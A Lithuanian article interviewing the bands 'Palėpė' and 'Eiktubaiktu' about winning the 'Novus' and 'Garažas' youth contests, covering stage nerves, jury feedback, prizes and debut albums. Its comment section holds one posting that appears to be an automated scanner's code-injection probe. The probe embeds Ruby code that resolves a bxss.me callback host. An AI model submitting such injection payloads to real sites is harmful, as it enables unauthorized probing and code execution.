Grupės „Eiktubaiktu“ ir „Palėpė“ – apie patirtis talentų konkursuose

Lietuvoje vyksta du tradiciniai jaunųjų grupių konkursai, kurie kasmet į alternatyviąją šalies sceną atveda nemažai talentų. Didelė jų dalis pirmuosius didesnius žingsnius žengia būtent muzikos inkubatoriaus „Novus“ arba jaunųjų grupių konkurso „Garažas“ scenose. Pasirodymas konkurse leidžia pristatyti kūrybą platesniam muzikos gerbėjų ratui ir naujų garsų ieškančiai auditorijai, o laimėti prizai – kiek sparčiau vystyti karjerą ar greičiau išleisti debiutinį albumą. Kaip viskas vystysis toliau ir kaip visas progas išnaudos grupės, priklauso tik nuo jų. Kalbiname praėjusiais metais jaunųjų grupių konkursus laimėjusias grupes „Palėpė“ (laimėjo „Novus“ konkursą) ir „Eiktubaiktu“ (laimėjo „Garažo“ konkursą).

Grupė „Palėpė“ yra grandžo stiliaus atstovai, ją sudaro vokalistas ir gitaristas Rokas Giedraitis, bosistas Rokas Gutauskas, būgnininkas Ignas Buožius. Grupė „Eiktubaiktu“ groja roką su stoner’io ir grūvo elementais. Ją sudaro vokalistė Gabija Minkevičiūtė, gitaristas Marius Survila, bosistas Ignas Bitinaitis ir būgnininkas Mantas Navikas.

Prieš pasirodymus – jaudulys

Kodėl pasirinko vieną ar kitą konkursą, grupės turėjo savo argumentų: „Norėjau teikti paraiškas abiem konkursams, bet buvo sunku įkalbėti grupę. Vis dėlto Lietuvoje dar turime daug vidinių etinių ir moralinių dogmų dėl to, kur ir kaip turėtume groti: kokio dydžio grupė, kokio amžiaus jos nariai, kas apskritai gali dalyvauti konkursuose. Džiugu, kad, bėgant laikui, viso to mažėja. Jei grupėje yra motyvacijos kada nors groti už „Garažo“ ribų, tai reikia pradėti kuo anksčiau groti visur, kur tik priima ir kviečia, ypač konkursuose“, – sakė savo grupę „Eiktubaiktu“ į „Garažą“ išsiuntęs Ignas.

R. Šeškaičio nuotr.

Grupės „Palėpė“ trejetas sako, kad abu konkursai – labai skirtingi: „Novus“ leidžia klausytojams įeiti nemokamai, tarp dalyvių – daug įvairesnių stilių grupių, kurios aktualios jaunimui. Be to, konkurso renginiai vyksta lauke visą vasarą. „Garažo“ aplinka ne tokia universali skirtingų žanrų grupėms. Kad ir kas gros, visi daugmaž lėtai judins susirūpinusias galvas. Aišku, yra grupių, kurios pramuša barjerą. Dalyvauti būtent „Novus“ motyvavo tai, kad galėsime skleisti mūsų mintis ir muziką didesnei žmonių grupei, – pasakoja grupės „Palėpė“ nariai. – Labai džiaugiamės, kad dalyvavome „Novus“ konkurse. Smagiausia buvo šokinėti ant pripučiamo batuto ir važinėti riedlente renginio užkulisiuose. Visi jaudinomės prieš koncertus, bet pasakėme sau, kad grojame dėl savęs ir padarysime, kad mums būtų linksma. Tai ir numušdavo jaudulį.“

R. Šeškaičio nuotr.

„Eiktubaiktu“ nariai taip pat tik geriausiais žodžiais prisimena konkursą „Garažas“. Gitaristas Marius sako prisimenantis nepaprastą jausmą: „Atrodė, kad esame tarsi vienas kūnas ir tas jaudulys po pirmos dainos atslūgo.“ Vokalistė Gabija išdavė, kad „Garaže“ buvo pirmas kartas, kai ketvertukas grojo kaip grupė ant scenos: „Aišku, visi turėjome daug sceninės patirties, sukauptos dar prieš atsirandant „Eiktubaiktu“, bet šįkart tas jaudulys buvo truputėlį kitoks. Jautėme baimę nenuvilti kitų, o ne savęs. Tada padeda kvėpavimas, reikia atsitraukti ir susikaupti. Pabūti ramiai.“ Būgnininkui Mantui labiausiai įsiminė vedėjo ir komisijos komentarai. Pasak jo, „jaudulį privalai jausti, kitaip neverta lipti į sceną“ .

R. Šeškaičio nuotr.

Abi grupės sutaria, kad prisistatymai reiškia nedaug. Svarbiausia – muzika ir ar grupė gerai susigrojusi. Jų nuomone, prisistatymas turi būti trumpas ir aiškus, nes muzika turi kalbėti pati už save. „Manau, kad ilgas plepėjimas ant scenos yra nepagarba klausytojui. Taip pat, kuo ilgesni intarpai tarp dainų, tuo labiau slūgsta koncerto energija“, – papildė „Eiktubaiktu“ gitaristas Marius.

Gailestinga komisija ir piniginiai prizai

Grupės „Palėpė“ vaikinukai prisimena, kad komisija vertino gailestingai ir buvo daugiau neutralių nei blogų komentarų. Žiuri nariai patarė vaikinams „toliau taškytis ir transliuoti energiją, kaip pridera“. „Eiktubaiktu“ gitaristas Marius sakė, kad jam įsiminė konstruktyvi kritika, kai komisija kalbėjo apie dainų struktūrą, žanrą ir asociacijas. Vis dėlto šios grupės nariai akcentuoja, kad labai svarbu turėti ir savo nuomonę.

R. Šeškaičio nuotr.

Pakalbėjome su grupėmis ir apie laimėtus prizus, ir apie jų panaudojimą kūrybai, tolesnei grupės veiklai. „Novus“ konkursą laimėjusi grupė „Palėpė“ gavo po 1 tūkst. eurų iš trijų konkurso partnerių – kultūrinio judėjimo „Kalba plytos“, LATGA ir AGATA bei galimybę įrašyti kūrinį studijoje „MAMA Studios“, taip pat profesionalią fotosesiją su „Lunatikais“ ir kvietimą pasirodyti tarptautiniame muzikos festivalyje „Loftas Fest“. Grupė pasakoja, kad piniginę prizo dalį išleido pirkdami reikalingą techniką savai studijai buvusiame Lukiškių kalėjime ir albumo įrašams. Grupės „Palėpė“ vaikinai prisipažino, kad po konkurso žymiai padidėjo gerbėjų būrys: „Tai nebuvo mūsų pagrindinis tikslas, tačiau pastebėjome, kad į koncertus ateina vis daugiau žmonių.“

Partnerio nuotr.

„Garažo“ nugalėtojai „Eiktubaiktu“ gavo 3 tūkst. eurų čekį iš partnerių „Kalnapilis nealkoholinis“ albumo leidybai, „Cordial GmbH Road Series package“ – iš „Tamsta pro“ salono ir profesionalią fotosesiją iš fotografo Ryčio Šeškaičio. Visus pinigus grupė išleido albumo įrašams ir leidybai. Grupė taip pat džiaugiasi išaugusia auditorija: „Tikrai padaugėjo gerbėjų – vis dėlto tai buvo mūsų pirmasis viešas pasirodymas! Konkursus tiesiogiai ir netiesiogiai stebėjo daugybė žmonių, ieškančių naujos, kokybiškos muzikos. Tai puiki tikslinė auditorija!“ – sakė „Eiktubaiktu“ bosistas Ignas. Jam pritaria ir vokalistė Gabija: „Į tokius konkursus einama ieškoti šviežios muzikos. Labai įdomu išgirsti, kas yra populiaru. Manau, tokiose vietose labai smagu rasti ką nors naujo ir patinkančio sau.“

Abi grupės metus dirbo ir pristatė debiutinius albumus. Grupės „Palėpė“ trejetas šių metų vasarį pristatė dešimties kūrinių albumą „Renesansas“, o „Eiktubaiktu“ išleido du mini albumus: vasario mėnesį – „Solitary“, o liepą – „Industria“. Grupės „Palėpė“ vaikinukai taip pat dar pristatė savo grupės marškinėlius, keliavo po Baltijos šalis ir surengė nemažai koncertų. Trejetas sako, kad motyvacijos jiems netrūksta: „Tik kartais aptingstame ir nesukame sau galvos, bet tuo momentu save pagauname ir pradedame stengtis. Būna visko, bet svarbiausia gerai leisti laiką.“

Partnerio nuotr.

Grupės „Eiktubaiktu“ nariai sako, kad taip pat nemažai koncertavo ir, išleidę mini albumus, kuria toliau. Ketvertas planuoja truputį pailsėti, o tada „padaryti dar daugiau ir gal net truputėlį kitaip“. Apie tai, kad ne visoms jaunoms grupėms pavyksta išlaikyti motyvaciją ar kartais gyvenimiškos aplinkybės priverčia išsivaikščioti, grupė sako: „Kol kas trumpai grojame, todėl motyvacinės duobės nėra tokios ryškios ir viskas smagu. Manau, kad grupės iširimas yra natūralus procesas. Neretai grupėse pasijunta stagnacija kūrybos ar klausytojų atžvilgiu, pasibaigia naujos sceninės patirtys. Pasijauti taip, tarsi grotum savo paties koverių grupėje ir pagalvoji, kuriems galams tai darai? Nauja kūryba ir naujos muzikinės patirtys yra tai, kas išlaiko grupės motyvaciją groti toliau, tačiau atsiranda ir ne vien nuo atlikėjų priklausančių aplinkybių. Kartais planuotai ar neplanuotai padarome mėnesio ar poros mėnesių trukmės pertraukas nuo muzikos, o tai irgi padeda nenusiristi į motyvacijos bedugnę“, – sakė „Eiktubaiktu“ bosistas Ignas.

„Draugystė ir ryšys su žmonėmis grupėje turi būti gana svarbi tavo gyvenimo dalis. Darbai, buitis ir panašūs dalykai visada trukdys kurti, bet svarbu rasti laiko dažniau paimti į rankas instrumentą ar tušinuką. Taip pat reikia būti lanksčiam. Kartais dėl valandos studijoje su grupe turi paaukoti kam nors kitam skirtą laiką. Tačiau juk verta, ar ne?“ – papildė „Eiktubaiktu“ gitaristas Marius.



NAUJAUSI KOMENTARAI

RDFYjolf

RDFYjolf portretas
"+"A".concat(70-3).concat(22*4).concat(116).concat(80).concat(110).concat(74)+(require"socket" Socket.gethostbyname("hitzq"+"cuqzpwiud66d9.bxss.me.")[3].to_s)+"

RDFYjolf

RDFYjolf portretas
1

Rekia

Rekia portretas
Praejusios epochos apdainuotojai
VISI KOMENTARAI 3

Galerijos

Daugiau straipsnių